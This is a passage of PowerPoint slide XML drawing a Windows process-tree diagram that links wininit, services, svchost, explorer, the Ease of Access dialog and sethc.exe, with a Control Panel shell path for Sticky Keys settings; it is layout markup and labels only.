                    <a:t>.exe</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp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id="{F6F68092-C3AD-6A3B-790C-AF4DF00579BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5594016" y="4439773"/>
                <a:ext cx="3145521" cy="834390"/>
                <a:chOff x="12600384" y="914400"/>
                <a:chExt cx="3145521" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="276" name="Rounded Rectangle 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F920707E-51EB-41DF-E73B-74AC371F38B7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600384" y="1103018"/>
                  <a:ext cx="2404204" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="424D56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9489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SK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77" name="Graphic 276">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0491ACEF-F05E-E3A4-FB48-1BFE8CC793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xmlns="" r:embed="rId4"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
                <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="278" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44D2470-B91F-B922-1170-BBFC8B047C23}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341701" y="914400"/>
                  <a:ext cx="2404204" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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1811382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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>sethc.exe</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="337" name="Picture 336">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A2F543-FFD4-6418-B882-BEB280352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62777" y="7220193"/>
              <a:ext cx="4319580" cy="1900615"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="281" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9CE97F2-8030-8B9C-65F9-D2DFEDBE2AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="307" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="11167914" y="3377741"/>
            <a:ext cx="1078008" cy="998741"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="287" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{038BBE54-0C9B-E312-5AF2-DC52DFA61229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="297" idx="2"/>
            <a:endCxn id="304" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12537460" y="3195260"/>
            <a:ext cx="242692" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxn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9523BBCC-E7A1-1B47-4C17-4948E9DBA0D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11821605" y="2631756"/>
            <a:ext cx="1674407" cy="442159"/>
            <a:chOff x="12235531" y="1103021"/>
            <a:chExt cx="1902758" cy="468181"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="297" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D175E66-5D3D-B7F0-5F90-6283CF13B6A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235531" y="1103021"/>
              <a:ext cx="1902752" cy="468181"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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8" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{073D72B5-EC89-CEA1-FB9E-B8BA99E02E3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324819" y="1138273"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wininit.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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22364452-EBC9-2B0B-2AA9-03E7A131DC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11821605" y="3316607"/>
            <a:ext cx="1674405" cy="442159"/>
            <a:chOff x="12235548" y="1103021"/>
            <a:chExt cx="1902754" cy="468181"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="304" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D77A864-A7E6-BE71-C722-338506C36494}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235548" y="1103021"/>
              <a:ext cx="1902752" cy="468181"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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5" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A99ADF1-F47C-9C83-3050-80AFE666F063}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324834" y="1138273"/>
              <a:ext cx="1813468" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>services.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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B26C21D4-48B6-592D-BEEC-80B3D8AAEFC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8398322" y="4195035"/>
            <a:ext cx="4628245" cy="3552478"/>
            <a:chOff x="8341172" y="4576035"/>
            <a:chExt cx="4628245" cy="3552478"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Rectangle: Rounded Corners 346">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A6F1A1-4E21-50E9-C1F3-F3396DF614AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8640705" y="6005433"/>
              <a:ext cx="4040032" cy="21230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6" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAC81D5-5201-A4A6-05AF-85583A25C541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="310" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8260051" y="5177194"/>
              <a:ext cx="578176" cy="183132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306" name="Group 305">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAE59FF-9F22-CC10-7952-41CA6865AD19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8341172" y="4576035"/>
              <a:ext cx="2818750" cy="442159"/>
              <a:chOff x="12235544" y="1103018"/>
              <a:chExt cx="3203167" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="307" name="Rounded Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EAA0B3E-4750-4EB8-8DC9-5D4DE0AA1BC6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235544" y="1103018"/>
                <a:ext cx="3192343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8" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C598B3A0-8C1D-FDA1-2F28-C5260A642417}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12324833" y="1138270"/>
                <a:ext cx="3113878" cy="413599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svchost.exe –k </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="16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netsvcs</a:t>
                </a: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p:grpSp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76F1D87D-4107-A7E6-9560-9FB8A58B99AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8640705" y="5158633"/>
              <a:ext cx="3382212" cy="788015"/>
              <a:chOff x="12600383" y="914400"/>
              <a:chExt cx="3843474" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="310" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1776FA72-E8EF-A4D7-5484-970365E4DF88}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600383" y="1103018"/>
                <a:ext cx="3781942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11" name="Graphic 310">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D06187-008E-8E9D-CCF9-9D5BD526CF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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="312" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBABDB09-CD0B-B673-C3C6-3E0E29C2BDD0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="3102157" cy="834390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kern="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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easeofaccessdialog</a:t>
                </a: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.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="313" name="Group 312">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B5E637-E29D-2484-FAE7-FEAB27D701B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8856329" y="6005433"/>
              <a:ext cx="3382211" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="3843473" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="314" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84759BAB-9AB7-5496-F5A6-C860F647B367}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2629073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15" name="Graphic 314">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB3B7BB0-35A6-8BB7-E5BE-36F42703A6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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="316" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785A222E-5894-D667-98B2-67382B96AE10}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="3102157" cy="834390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kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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explorer</a:t>
                </a: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.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="317" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83B4715E-7267-DCF7-D48E-5AC24DBA57D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="314" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8461344" y="6009662"/>
              <a:ext cx="625719" cy="164251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346" name="Group 345">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C78DD115-317F-CAF2-1CBD-A0289B4011D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8781435" y="6769865"/>
              <a:ext cx="4187982" cy="1101473"/>
              <a:chOff x="9280112" y="7261477"/>
              <a:chExt cx="4187982" cy="1101473"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="341" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36E91EC1-1D1F-FD13-1ABD-C3C81CAE9966}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9549768" y="7261477"/>
                <a:ext cx="3918326" cy="1101473"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:srgbClr val="D80B55">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/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lvl="0" defTabSz="1371600"/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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Command Line</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>: </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D555645E-D4F8-4c29-A827-D93C859C4F2A}\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>pageStickyKeysSettings</a:t>
                </a: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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="342" name="Graphic 341">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B3E60B-41ED-7CED-F024-39ED716A98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9280112" y="7304609"/>
                <a:ext cx="264171" cy="283513"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grp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4D25721D-8334-0523-D41A-255DFA182B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13014554" y="3758766"/>
            <a:ext cx="3558948" cy="942039"/>
            <a:chOff x="10205538" y="9008214"/>
            <a:chExt cx="3558948" cy="942039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="348" name="Elbow Connector 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F5A427-1D52-A69E-DA18-3C84BCE5B84B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="350" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="10029241" y="9184511"/>
              <a:ext cx="720960" cy="368365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349" name="Group 348">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56843737-5E19-E983-AF13-6E073D1CCC6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10573904" y="9508094"/>
              <a:ext cx="3190582" cy="442159"/>
              <a:chOff x="12235545" y="1103018"/>
              <a:chExt cx="3625709" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="350" name="Rounded Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB3EB62-6056-4A68-A677-446FEADC05E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="3625709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1" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{130580FD-4986-3C24-0CAE-BFA863784BB7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12324833" y="1138270"/>
                <a:ext cx="3536421" cy="413599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svchost.exe –k </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="16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DcomLaunch</a:t>
                </a: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p:grp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F7D3A097-7CC0-73E3-A3DB-65A7A096B4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14093072" y="6303256"/>
            <a:ext cx="3051243" cy="788015"/>
            <a:chOff x="12600383" y="914400"/>
            <a:chExt cx="3467368" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="Rounded Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F80E4C-2914-8121-8BEA-780465A58CDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600383" y="1103018"/>
              <a:ext cx="2674386" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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6" name="Graphic 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7263222-9CF6-59BD-CF25-8BDC1ECF11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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239ACAD0-E76F-18B5-0C07-E169D217971B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
